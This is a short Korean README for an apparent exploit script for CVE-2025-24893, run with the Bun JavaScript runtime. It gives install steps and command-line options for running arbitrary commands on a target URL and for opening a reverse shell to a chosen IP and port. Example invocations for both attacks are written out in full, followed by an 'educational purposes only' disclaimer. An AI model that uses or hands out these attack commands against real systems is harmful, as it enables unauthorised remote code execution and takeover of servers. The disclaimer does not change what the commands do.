
bun 설치:
curl -fsSL https://bun.com/install | bash
의존성 설치:
bun install
실행:
bun run CVE-2025-24893.ts
이 프로젝트는 bun v1.2.19에서 bun init을 사용하여 생성되었습니다. Bun은 빠른 올인원 JavaScript 런타임입니다.
Usage: bun CVE-2025-24893.ts [options]
Options:
-u, --url <url> The target URL to interact with.
-i, --ip <ip-address> The IP address for a reverse shell connection.
-p, --port <port-number> The port number for the reverse shell.
-r, --rverse Open a reverse shell connection.
-c, --cmd <command> Execute a specific command.
Examples:
# Execute a command on a target URL
bun CVE-2025-24893.ts --url http://example.com --cmd "ls -la"
# Open a reverse shell
bun CVE-2025-24893.ts --rverse --ip 127.0.0.1 --port 4444
이 익스플로잇과 가이드는 교육 목적으로만 제공됩니다. 이 정보를 책임감 있게 사용하고, 명시적으로 테스트 권한을 부여받은 시스템에서만 사용하십시오. 허가되지 않은 시스템 악용은 불법적이며 비윤리적입니다. 작성자와 기여자는 이 정보로 인해 발생한 오용이나 손해에 대해 책임을 지지 않습니다.